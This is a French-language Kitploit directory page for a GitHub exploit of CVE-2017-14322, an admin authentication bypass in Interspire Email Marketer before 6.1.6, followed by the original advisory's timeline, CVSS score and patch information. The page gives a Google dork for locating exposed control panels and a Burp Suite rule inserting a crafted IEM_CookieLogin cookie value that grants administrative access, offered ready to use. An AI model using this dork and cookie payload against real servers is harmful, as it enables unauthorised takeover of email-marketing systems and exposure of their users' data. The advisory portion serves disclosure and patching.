Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-14322 — CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit | Kitploit
Outils/GitHubGitHub/joesmithjaffa/cve-2017-14322
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit

Voir le dépôt
512il y a 8 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-14322 Exploitation d'Interspire Email Marketer (emailmarketer)

Google Dork

root@kitploit:~
intitle:"Control Panel" + emailmarketer

Exploitation via Burp Suit

Ajoutez une règle Match and Replace pour l'en-tête de requête comme ci-dessous :

root@kitploit:~
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

Lorsque vous ouvrez le site, cela ne fonctionnera pas la première fois car l'en-tête Cookie n'est pas présent. Rafraîchissez le site une deuxième fois en utilisant le proxy Burp avec la règle ajoutée ci-dessus, vous verrez ce que vous souhaitiez. Assurez-vous de cocher « Intercept Client Requests »

Titre :

Interspire Email Marketer - Contournement d'authentification admin à distance

Auteur :

Hakan Küsne, Infoteam Security (CH)

Identifiant CVE :

CVE-2017-14322

Informations sur le risque :

Score de base CVSS : 9.8 Vecteur CVSS : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

Chronologie :

2017-09-12 Vulnérabilité découverte 2017-09-12 Découverte que le fournisseur l'avait déjà corrigée mais n'en a jamais informé les clients, laissant des centaines de vulnérables en environnement réel 2017-10-17 Divulgation publique

Produits affectés :

Interspire Email Marketer antérieur à la version 6.1.6

Page d'accueil du fournisseur :

http://www.interspire.com/emailmarketer/

Détails :

La fonction chargée de vérifier si l'utilisateur est déjà connecté dans init.php d'Interspire Email Marketer (IEM) antérieur à 6.1.6 permet à des attaquants distants de contourner l'authentification et d'obtenir un accès administratif en utilisant le cookie IEM_CookieLogin avec une valeur spécialement conçue. De plus, si le client n'a pas de plan de maintenance annuel, l'application indique qu'elle est sur la dernière version disponible et qu'il n'y a pas de mise à jour.

Les vulnérabilités ont été découvertes lors d'une réponse à incident sur une instance compromise de l'application.

Preuve de concept :

Détails fournis ici : https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

Correctif :

Le fournisseur a corrigé la vulnérabilité dans la version 6.1.6, mais n'en a jamais spécifiquement informé ses clients.

Remarque :

Cet exploit est uniquement à des fins éducatives et n'est pas responsable de vos propres actions.

Télécharger l’outil